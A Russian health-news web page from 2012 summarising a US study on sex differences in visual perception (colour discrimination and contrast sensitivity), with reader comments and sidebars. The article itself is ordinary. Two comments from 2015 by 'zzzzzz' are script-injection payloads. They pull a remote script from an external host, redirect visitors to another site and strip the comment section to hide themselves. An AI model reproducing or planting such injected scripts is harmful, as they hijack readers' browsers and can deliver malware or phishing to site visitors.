Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Женщины и мужчины видят п...  >>  Женщины и мужчины видят по-разному
 
Обратная связь
 

Женщины и мужчины видят по-разному

Размер шрифта
26 сентября 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Американские ученые выяснили, что у мужчин и женщин зрительные центры головного мозга работают по-разному. 

 

Что такое зрение

Зрение – это процесс обработки изображений, который осуществляется зрительным анализатором и позволяет получить представление о величине, форме и цвете предметов, их взаимном расположении и расстоянии между ними. Зрительный анализатор состоит из глазного яблока, проводящих путей и зрительной коры головного мозга.

Лучи света фокусируются оптической системой глаза на воспринимающем аппарате – сетчатке. Под воздействием световых лучей в фоторецепторах сетчатки происходит фотохимическая реакция, в результате которой вырабатывается электрический импульс. В конечном счете, зрительная информация передается в виде импульсов по волокнам зрительного нерва в головной мозг, где и происходит формирование зрительного образа.

Мужские половые гормоны

В зрительной коре головного мозга находится большое количество рецепторов мужских половых гормонов, особенно, в той ее части, которая отвечает за обработку изображений. Мужские половые гормоны контролируют формирование нервных клеток зрительной коры во время внутриутробного развития, т.е. у мужчин на 25% больше таких нейронов, чем у женщин.

Суть исследования

В исследовании приняли участие мужчины и женщины старше 16 лет с нормальным зрением. После того как участников исследования попросили описать цвета, которые они видели, выяснилось, что мужчины хуже различают оттенки разных цветов.

Для исследования контрастной чувствительности ученые использовали изображения со светлыми и темными полосами, направленными горизонтально или вертикально. Меняя скорость движения полос или расстояние между полосами, ученые обнаружили, что мужчины лучше различают быстро сменяющие изображения, расположенные близко друг к другу.

Результаты

Результаты исследования свидетельствуют о том, что мужчины и женщины имеют различия в зрительном восприятии. По всей видимости, это обусловлено влиянием мужских половых гормонов на формирование нейронов зрительной коры во время внутриутробного развития.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

18 ноября 2012 в 12:44

Цитировать   |   Пожаловаться

А может быть дело не в том, что мужчины хуже РАЗЛИЧАЮТ оттенки, а в том, что они НАЗЫВАЮТ их одинаково? По-моему, только определённая категория женщин способна увидеть разницу между грязно-жёлтым и горчичным, ярко-розовым и фуксией, красным и коралловым и т.д.

2 - zzzzzz

30 июня 2015 в 21:28

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:35

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Глаза расскажут о состоянии головного мозга   Женский мозг может стать мужским   Попкорн, который мы едим в кино, вызывает слабоумие   Особенность мозга Альберта Эйнштейна  
25 сентября 2012Женщины и мужчины видят по-разному! 20 ноября 2012Женский мозг может стать мужским
 
28 августа 2012Если вы лечите диабет – будете умнее! 26 февраля 2013Ученые создают мозговые клетки из мочи
 

Слайдшоу

1
Лучшие продукты для мозга
Супереда для памяти
Мифы и правда о старческом слабоумии

Тесты

1
Знаете ли вы свой мозг?
Что вы знаете о груди?
Яички – удивительный орган
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.